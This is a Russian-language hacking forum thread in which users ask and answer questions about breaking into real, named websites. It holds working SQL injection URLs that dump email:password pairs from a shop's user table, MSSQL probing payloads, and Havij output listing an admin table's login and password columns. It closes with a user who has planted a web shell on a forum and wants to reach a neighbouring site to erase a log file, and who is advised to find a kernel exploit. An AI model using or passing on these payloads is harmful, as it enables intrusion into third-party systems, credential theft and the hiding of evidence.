Ваши вопросы по уязвимостям.

как?

 

В мозиле: Вид - Кодировка и попробуй каждую

 

а ну ладно, нужные мне данные в БД серовно на английском, они нормально отображаются
тут я столкнулся с другой проблемой, мне надо вывести данные вида маил:пасс

но я столкнулся с такой проблемой,
при такой конструкции concat_ws(0x3a,email,password)
выводит ошибку

PHP:

Illegal mix of collations (binary,COERCIBLE), (latin1_swedish_ci,IMPLICIT), (cp1251_general_ci,IMPLICIT) for operation 'concat_ws'


как можно ещо попробовать вывести в нужном для меня виде?

 

unhex(hex(concat_ws(0x3a,email,password)))

 

непомогло

 

Нужен линк, так сложно определить в чем проблема

 

PHP:

http://motoprotect.com.ua/index.php?id=12'+or+1+group+by+concat((select+unhex(hex(concat_ws(0x3a,email,password)))+from+user+limit+1,1),floor(rand(0)*2))having+min(0)+or+1--+


 

Выводи пока так

и так еще можно:

 

о, спасибо, а чё ето за чудо конструкция??

http://motoprotect.com.ua/index.php?id=-12'+union+select+1,2,(select(@x)from(select(@x:=0x 00),(select(0)from(user)where(0x00)in(@x:=concat(@ x,0x3c62723e,email,0x3a,password))))x),4+--+

где я могу почитать о том что ето (@x:=0x 00) и тп, означает?

 

http://mysql.ru/docs/man/Variables.html

 

вопрос технического характера, как отследить HTTPS запрос?

 

Подскажите, здесь есть уязвимость, или только раскрытие путей:
saturn.net/contacts.php?id=4%27

уж больно пути странные пишет...

 

Подскажите... есть сайт, есть форма. Фильтр на иньекцию -

Code:

function is_secure($string)
			{
			
			//todo : better one (maybe, have to check) ver 1 : seems 2 be fine (only a-z 0-9)
				$pattern = "#[^A-Za-z0-9]#";	
				
					if(@preg_match($pattern,$string)==true) return false;
						else
							return true;
			}

Если делаем так :

Code:

<input name="u" id="input" value="Username[]" type="text"  maxlength="12" /><br /><br />

preg_match обламывается на том, что ему передаётся массив, а не стринг. Можно ли что-нибудь кроме раскрытия путей замутить ?

 

нельзя

 

Только раскрытие путей.
Но имеются другие уязвимые параметры и они говорят, что стоит база MSSQL , например:
http://saturn.net/news.php?id=430+order+by+datalength(@@version)+--+
http://saturn.net/news.php?id=convert(int,db_name()+COLLATE+SQL_Latin1_General_Cp1254_CS_AS)+and+1=1
а, дальше вбиваешь этот url в havij и раскручиваешь да таблицы с паролем от админки
Count(name) of syscolumns Where id=(SELECT id FROM sysobjects WHERE name=char(119)%2bchar(95)%2bchar(83)%2bchar(105)%2bchar(116)%2bchar(101)%2bchar(85)%2bchar(115)%2bchar(101)%2bchar(114)) is 6
Column found: FullName
Column found: id
Column found: isEnabled
Column found: isSuperUser
Column found: Login
Column found: Password

 

http://www.kupibt.ru/catalogue/ID_19467
А эту как?

 

А где ты тут скулю видишь?

 

Имею 2 сайта на 1м IP адресе,обычный сайт и форум IPB,в форум IPВ я залил шелл,мне нужно попасть на 1й сайт,чтобы почистить там 1 лог файл..есть варианты как переместиться на 1й сайт?..шелл определяет пути и т.п к 1му сайту но туда пройти не может.

 

Смотри версию ядра и ищи сплоит

 

http://forum.antichat.ru/thread296327.html